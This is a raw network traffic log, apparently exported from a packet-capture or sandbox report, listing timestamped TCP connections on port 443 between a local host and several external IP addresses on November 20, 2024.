                                                                                                                                                                                              Nov 20, 2024 21:28:27.221628904 CET49838443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:27.221642971 CET44349838199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.224865913 CET44349817185.146.173.20192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.224906921 CET44349817185.146.173.20192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.224937916 CET49817443192.168.2.5185.146.173.20
                                                                                                                                                                                              Nov 20, 2024 21:28:27.224953890 CET44349817185.146.173.20192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.224996090 CET49817443192.168.2.5185.146.173.20
                                                                                                                                                                                              Nov 20, 2024 21:28:27.232393980 CET44349817185.146.173.20192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.239964962 CET44349817185.146.173.20192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.240015984 CET49817443192.168.2.5185.146.173.20
                                                                                                                                                                                              Nov 20, 2024 21:28:27.240026951 CET44349817185.146.173.20192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.240039110 CET44349817185.146.173.20192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.240087986 CET49817443192.168.2.5185.146.173.20
                                                                                                                                                                                              Nov 20, 2024 21:28:27.247554064 CET44349817185.146.173.20192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.255110025 CET44349817185.146.173.20192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.255153894 CET49817443192.168.2.5185.146.173.20
                                                                                                                                                                                              Nov 20, 2024 21:28:27.255167007 CET44349817185.146.173.20192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.258419037 CET49818443192.168.2.5108.158.75.29
                                                                                                                                                                                              Nov 20, 2024 21:28:27.262780905 CET44349817185.146.173.20192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.262840986 CET49817443192.168.2.5185.146.173.20
                                                                                                                                                                                              Nov 20, 2024 21:28:27.262852907 CET44349817185.146.173.20192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.270301104 CET44349817185.146.173.20192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.270359039 CET49817443192.168.2.5185.146.173.20
                                                                                                                                                                                              Nov 20, 2024 21:28:27.270370007 CET44349817185.146.173.20192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.277831078 CET44349817185.146.173.20192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.277889967 CET49817443192.168.2.5185.146.173.20
                                                                                                                                                                                              Nov 20, 2024 21:28:27.277901888 CET44349817185.146.173.20192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.289891958 CET44349815199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.289958000 CET44349815199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.290009975 CET49815443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:27.290020943 CET44349815199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.290071011 CET49815443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:27.291800976 CET44349814199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.291863918 CET44349814199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.291943073 CET49814443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:27.292002916 CET44349814199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.292094946 CET49814443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:27.293833971 CET44349813199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.293879032 CET44349813199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.293925047 CET49813443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:27.293932915 CET44349813199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.293976068 CET49813443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:27.299715042 CET44349814199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.299801111 CET49814443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:27.302421093 CET44349813199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.302428961 CET44349813199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.302500010 CET49813443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:27.303009987 CET44349815199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.303035975 CET44349815199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.303081989 CET49815443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:27.306050062 CET44349812199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.306112051 CET44349812199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.306168079 CET49812443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:27.306190014 CET44349812199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.306236029 CET49812443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:27.311449051 CET44349815199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.311548948 CET49815443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:27.311580896 CET44349815199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.311702967 CET49815443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:27.314152956 CET44349812199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.314173937 CET44349812199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.314229965 CET49812443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:27.315884113 CET44349820142.250.181.34192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.316118002 CET49820443192.168.2.5142.250.181.34
                                                                                                                                                                                              Nov 20, 2024 21:28:27.316132069 CET44349820142.250.181.34192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.316647053 CET44349814199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.316720009 CET49814443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:27.317274094 CET44349820142.250.181.34192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.317348003 CET49820443192.168.2.5142.250.181.34
                                                                                                                                                                                              Nov 20, 2024 21:28:27.318380117 CET49820443192.168.2.5142.250.181.34
                                                                                                                                                                                              Nov 20, 2024 21:28:27.318445921 CET44349820142.250.181.34192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.318561077 CET49820443192.168.2.5142.250.181.34
                                                                                                                                                                                              Nov 20, 2024 21:28:27.318569899 CET44349820142.250.181.34192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.319113016 CET44349813199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.319125891 CET44349813199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.319184065 CET49813443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:27.319883108 CET49817443192.168.2.5185.146.173.20
                                                                                                                                                                                              Nov 20, 2024 21:28:27.320442915 CET44349819141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.320595980 CET44349819141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.320802927 CET49819443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:27.322202921 CET49819443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:27.322212934 CET44349819141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.328278065 CET44349815199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.328299046 CET44349815199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.328340054 CET49815443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:27.331069946 CET44349812199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.331135035 CET49812443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:27.331142902 CET44349812199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.331181049 CET49812443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:27.331187963 CET49839443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:27.331233978 CET44349839141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.331341982 CET49839443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:27.331579924 CET49839443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:27.331613064 CET44349839141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.339581966 CET44349812199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.339600086 CET44349812199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.339885950 CET49812443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:27.362220049 CET44349814199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.362346888 CET49814443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:27.366883993 CET49820443192.168.2.5142.250.181.34
                                                                                                                                                                                              Nov 20, 2024 21:28:27.367944002 CET49815443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:27.383531094 CET49812443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:27.386573076 CET49840443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:27.386605978 CET44349840141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.386694908 CET49840443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:27.386914968 CET49840443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:27.386929989 CET44349840141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.401485920 CET44349817185.146.173.20192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.403844118 CET44349817185.146.173.20192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.403923988 CET49817443192.168.2.5185.146.173.20
                                                                                                                                                                                              Nov 20, 2024 21:28:27.403938055 CET44349817185.146.173.20192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.407695055 CET44349827141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.407927036 CET49827443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:27.407952070 CET44349827141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.409112930 CET44349817185.146.173.20192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.409177065 CET49817443192.168.2.5185.146.173.20
                                                                                                                                                                                              Nov 20, 2024 21:28:27.409188986 CET44349817185.146.173.20192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.409192085 CET44349827141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.409605980 CET49827443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:27.409764051 CET49827443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:27.409821033 CET44349827141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.413094997 CET44349813199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.413101912 CET44349813199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.413173914 CET49813443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:27.414114952 CET44349817185.146.173.20192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.414298058 CET49817443192.168.2.5185.146.173.20
                                                                                                                                                                                              Nov 20, 2024 21:28:27.414308071 CET44349817185.146.173.20192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.424474955 CET44349817185.146.173.20192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.424561977 CET49817443192.168.2.5185.146.173.20
                                                                                                                                                                                              Nov 20, 2024 21:28:27.424572945 CET44349817185.146.173.20192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.424639940 CET49817443192.168.2.5185.146.173.20
                                                                                                                                                                                              Nov 20, 2024 21:28:27.434653044 CET44349817185.146.173.20192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.434674978 CET44349817185.146.173.20192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.434729099 CET49817443192.168.2.5185.146.173.20
                                                                                                                                                                                              Nov 20, 2024 21:28:27.444725990 CET44349817185.146.173.20192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.444750071 CET44349817185.146.173.20192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.444787979 CET49817443192.168.2.5185.146.173.20
                                                                                                                                                                                              Nov 20, 2024 21:28:27.444802046 CET44349817185.146.173.20192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.444825888 CET49817443192.168.2.5185.146.173.20
                                                                                                                                                                                              Nov 20, 2024 21:28:27.454993963 CET44349817185.146.173.20192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.455049038 CET49817443192.168.2.5185.146.173.20
                                                                                                                                                                                              Nov 20, 2024 21:28:27.455065012 CET44349817185.146.173.20192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.455112934 CET49817443192.168.2.5185.146.173.20
                                                                                                                                                                                              Nov 20, 2024 21:28:27.460345030 CET49827443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:27.460539103 CET44349817185.146.173.20192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.460607052 CET49817443192.168.2.5185.146.173.20
                                                                                                                                                                                              Nov 20, 2024 21:28:27.470361948 CET44349817185.146.173.20192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.470453024 CET49817443192.168.2.5185.146.173.20
                                                                                                                                                                                              Nov 20, 2024 21:28:27.475708961 CET44349821104.22.1.204192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.475773096 CET44349821104.22.1.204192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.475811958 CET44349821104.22.1.204192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.475841045 CET49821443192.168.2.5104.22.1.204
                                                                                                                                                                                              Nov 20, 2024 21:28:27.475861073 CET44349821104.22.1.204192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.475913048 CET44349821104.22.1.204192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.475951910 CET44349821104.22.1.204192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.475965023 CET49821443192.168.2.5104.22.1.204
                                                                                                                                                                                              Nov 20, 2024 21:28:27.475980997 CET44349821104.22.1.204192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.476010084 CET49821443192.168.2.5104.22.1.204
                                                                                                                                                                                              Nov 20, 2024 21:28:27.480397940 CET44349817185.146.173.20192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.480477095 CET49817443192.168.2.5185.146.173.20
                                                                                                                                                                                              Nov 20, 2024 21:28:27.484055996 CET44349821104.22.1.204192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.484124899 CET49821443192.168.2.5104.22.1.204
                                                                                                                                                                                              Nov 20, 2024 21:28:27.484141111 CET44349821104.22.1.204192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.490690947 CET44349817185.146.173.20192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.490762949 CET49817443192.168.2.5185.146.173.20
                                                                                                                                                                                              Nov 20, 2024 21:28:27.492649078 CET44349821104.22.1.204192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.492732048 CET49821443192.168.2.5104.22.1.204
                                                                                                                                                                                              Nov 20, 2024 21:28:27.492747068 CET44349821104.22.1.204192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.494312048 CET44349815199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.494335890 CET44349815199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.494380951 CET49815443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:27.495891094 CET44349817185.146.173.20192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.495969057 CET49817443192.168.2.5185.146.173.20
                                                                                                                                                                                              Nov 20, 2024 21:28:27.517591000 CET44349815199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.517653942 CET49815443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:27.517666101 CET44349815199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.517709970 CET49815443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:27.517829895 CET44349814199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.517891884 CET49814443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:27.518194914 CET44349813199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.518255949 CET49813443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:27.519946098 CET44349812199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.519968033 CET44349812199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.520009995 CET49812443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:27.523514032 CET44349817185.146.173.20192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.523571968 CET49817443192.168.2.5185.146.173.20
                                                                                                                                                                                              Nov 20, 2024 21:28:27.525613070 CET44349814199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.525676012 CET49814443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:27.525784969 CET44349813199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.525841951 CET49813443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:27.528728962 CET44349817185.146.173.20192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.528791904 CET49817443192.168.2.5185.146.173.20
                                                                                                                                                                                              Nov 20, 2024 21:28:27.530533075 CET44349812199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.530600071 CET49812443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:27.530608892 CET44349812199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.530661106 CET49812443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:27.532217026 CET44349815199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.532236099 CET44349815199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.532290936 CET49815443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:27.532784939 CET4434980545.61.136.196192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.532844067 CET4434980545.61.136.196192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.532864094 CET4434980545.61.136.196192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.532883883 CET4434980545.61.136.196192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.532903910 CET49805443192.168.2.545.61.136.196
                                                                                                                                                                                              Nov 20, 2024 21:28:27.532931089 CET4434980545.61.136.196192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.532957077 CET49805443192.168.2.545.61.136.196
                                                                                                                                                                                              Nov 20, 2024 21:28:27.538501024 CET49821443192.168.2.5104.22.1.204
                                                                                                                                                                                              Nov 20, 2024 21:28:27.538909912 CET44349817185.146.173.20192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.538964033 CET49817443192.168.2.5185.146.173.20
                                                                                                                                                                                              Nov 20, 2024 21:28:27.539710999 CET44349815199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.539764881 CET49815443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:27.539781094 CET44349815199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.539868116 CET49815443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:27.540843010 CET44349813199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.540873051 CET44349814199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.540899992 CET49813443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:27.540950060 CET49814443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:27.545924902 CET44349812199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.545938015 CET44349812199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.545989037 CET49812443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:27.553585052 CET44349812199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.553596020 CET44349812199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.553647995 CET49812443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:27.554016113 CET44349813199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.554073095 CET49813443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:27.556171894 CET44349814199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.556250095 CET49814443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:27.583978891 CET49805443192.168.2.545.61.136.196
                                                                                                                                                                                              Nov 20, 2024 21:28:27.589656115 CET4434980545.61.136.196192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.589685917 CET4434980545.61.136.196192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.589701891 CET4434980545.61.136.196192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.589739084 CET49805443192.168.2.545.61.136.196
                                                                                                                                                                                              Nov 20, 2024 21:28:27.589787006 CET49805443192.168.2.545.61.136.196
                                                                                                                                                                                              Nov 20, 2024 21:28:27.589806080 CET4434980545.61.136.196192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.590034962 CET4434980545.61.136.196192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.590229988 CET49805443192.168.2.545.61.136.196
                                                                                                                                                                                              Nov 20, 2024 21:28:27.593199015 CET49805443192.168.2.545.61.136.196
                                                                                                                                                                                              Nov 20, 2024 21:28:27.593220949 CET4434980545.61.136.196192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.596333981 CET44349821104.22.1.204192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.612082958 CET44349817185.146.173.20192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.612150908 CET49817443192.168.2.5185.146.173.20
                                                                                                                                                                                              Nov 20, 2024 21:28:27.613984108 CET44349817185.146.173.20192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.614069939 CET49817443192.168.2.5185.146.173.20
                                                                                                                                                                                              Nov 20, 2024 21:28:27.621903896 CET44349817185.146.173.20192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.621967077 CET49817443192.168.2.5185.146.173.20
                                                                                                                                                                                              Nov 20, 2024 21:28:27.629298925 CET44349817185.146.173.20192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.629357100 CET49817443192.168.2.5185.146.173.20
                                                                                                                                                                                              Nov 20, 2024 21:28:27.631962061 CET44349815199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.631988049 CET44349815199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.632052898 CET49815443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:27.634233952 CET44349814199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.634316921 CET49814443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:27.636708021 CET44349817185.146.173.20192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.636778116 CET49817443192.168.2.5185.146.173.20
                                                                                                                                                                                              Nov 20, 2024 21:28:27.636945963 CET44349815199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.637007952 CET49815443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:27.637017012 CET44349815199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.637062073 CET49815443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:27.637725115 CET49841443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:27.637757063 CET44349841141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.638000011 CET49841443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:27.638730049 CET44349813199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.638787031 CET49813443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:27.639153957 CET44349814199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.639216900 CET49814443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:27.640361071 CET44349817185.146.173.20192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.640428066 CET49817443192.168.2.5185.146.173.20
                                                                                                                                                                                              Nov 20, 2024 21:28:27.640697002 CET44349812199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.640712976 CET44349812199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.640748024 CET49812443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:27.641274929 CET49821443192.168.2.5104.22.1.204
                                                                                                                                                                                              Nov 20, 2024 21:28:27.643587112 CET49841443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:27.643599987 CET44349841141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.647074938 CET44349813199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.647145033 CET49813443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:27.647737980 CET44349817185.146.173.20192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.647799015 CET49817443192.168.2.5185.146.173.20
                                                                                                                                                                                              Nov 20, 2024 21:28:27.651532888 CET44349817185.146.173.20192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.651607037 CET44349815199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.651640892 CET49817443192.168.2.5185.146.173.20
                                                                                                                                                                                              Nov 20, 2024 21:28:27.651700974 CET49815443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:27.652213097 CET44349812199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.652266026 CET49812443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:27.652724028 CET44349813199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.652784109 CET49813443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:27.654783964 CET44349814199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:27.654855967 CET49814443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:27.655704975 CET44349817185.146.173.20192.168.2.5
